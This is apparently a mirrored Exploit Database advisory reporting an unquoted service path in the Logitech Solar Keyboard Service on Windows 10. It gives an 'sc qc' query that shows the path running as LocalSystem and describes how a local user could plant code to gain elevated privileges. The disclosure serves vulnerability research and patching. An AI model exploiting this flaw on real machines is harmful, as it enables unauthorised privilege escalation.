Logitech Solar Keyboard Service – ‘L4301_Solar’ Unquoted Service Path

• Exploit Database
• 38 阅读

• 作者： Jair Amezcua
  日期： 2020-11-16
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49050/

• # Title: Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path
  # Author: Jair Amezcua
  # Date: 2020-11-10
  # Vendor Homepage: https://www.logitech.com/es-mx
  # Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750
  # Version : 1.10.3.0
  # Tested on: Windows 10 64bit(EN)
  # CVE : N/A
  
  # 1. Description:
  # Unquoted service paths in Logitech Solar Keyboard Servicev1.10.3.0 have an unquoted service path.
  
  # PoC
  ===========
  
  C:\>sc qc L4301_Solar
  [SC] QueryServiceConfig SUCCESS
  SERVICE_NAME: L4301_Solar
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
  LOAD_ORDER_GROUP : PlugPlay
  TAG: 0
  DISPLAY_NAME : Logitech Solar Keyboard Service
  DEPENDENCIES : PlugPlay
  SERVICE_START_NAME : LocalSystem
  
  
  #Description Exploit:
  # A successful attempt would require the local user to be able to insert their code in the system root path 
  # undetected by the OS or other security applications where it could potentially be executed during 
  # application startup or reboot. If successful, the local user's code would execute with the elevated 
  # privileges of the application.